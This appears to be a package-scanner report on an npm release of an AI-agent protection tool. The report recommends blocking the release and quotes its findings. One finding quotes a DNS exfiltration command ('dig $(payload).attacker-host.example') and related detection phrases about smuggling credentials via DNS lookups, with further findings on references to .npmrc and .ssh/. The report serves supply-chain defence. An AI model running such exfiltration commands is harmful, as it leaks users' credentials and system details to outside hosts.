PkgRadar

Package evidence

@roxy-agent/[email protected]

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Weekly downloads
346
Versions published
14
First published
May 2026
Publisher
dwang88

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@roxy-agent/[email protected]"],"fail_on":"high"}'
Publisherdwang88
Artifact bytes106,998
Previous version0.5.5
Published2026-06-07T08:45:57.858Z
SHA-256007b9b64158e08496c1fdf55183a68ba67dfba6eb639bc9da492f41901ece9b0

Why flagged

What the scanner saw

DNS / OAST exfiltration: matched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

high
Last checked
highRisk
50Score
0.5.6Version
Status history (1 event)
  1. newavailable · risk high · score 50 · status changed

Evidence

Static findings

4 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
Show all 4 findings (low-signal and informational)
SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/dist/ml/prototypes.jsmatched "dig $(payload).attacker-host.example +short for dns exfil\",\n \"smuggle credential bytes inside dns lookup labels\",\n \"nslookup with shell substitution embedding hostname or whoami in the query\",\n \"host $("30
mediumCredential file accesspackage/dist/classifier.jsmatched ".npmrc"10
lowCredential file accesspackage/dist/protection.jsmatched ".ssh/"5
lowCredential file accesspackage/dist/ml/prototypes.jsmatched ".ssh/"5

Manifest

Package metadata

Scripts14
  • buildnode scripts/clean-dist.mjs && tsc && node scripts/postbuild.mjs
  • connectnode dist/index.js connect
  • devtsx src/index.ts
  • dev:watchtsx watch src/index.ts
  • doctornode dist/index.js doctor
  • prepacknpm run build
  • prepublishOnlynpm run build
  • protectnode dist/index.js protect
  • setupnode dist/index.js setup
  • startnode dist/index.js
  • teardownnode dist/index.js teardown
  • typechecktsc --noEmit
  • unprotectnode dist/index.js unprotect
  • unsetupnode dist/index.js teardown
Dependencies5
  • @huggingface/transformers^4.2.0
  • @modelcontextprotocol/sdk^1.29.0
  • axios^1.16.1
  • better-sqlite3^12.9.0
  • zod^3.25.76